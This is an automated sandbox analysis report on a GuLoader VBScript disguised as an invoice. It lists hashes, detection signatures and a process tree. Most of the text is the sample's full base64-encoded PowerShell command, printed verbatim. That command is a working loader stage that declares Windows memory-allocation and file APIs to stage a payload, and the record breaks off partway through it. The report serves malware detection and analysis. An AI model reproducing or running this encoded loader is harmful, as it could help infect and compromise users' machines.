Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name:WWVN_INVOICE_8363567453.vbs
Analysis ID:623396
MD5:9f8e253fd51c33a2f874942ebc0d3795
SHA1:6868a9005489e56542cf0df063985132fef50f3d
SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5560 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6876 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUA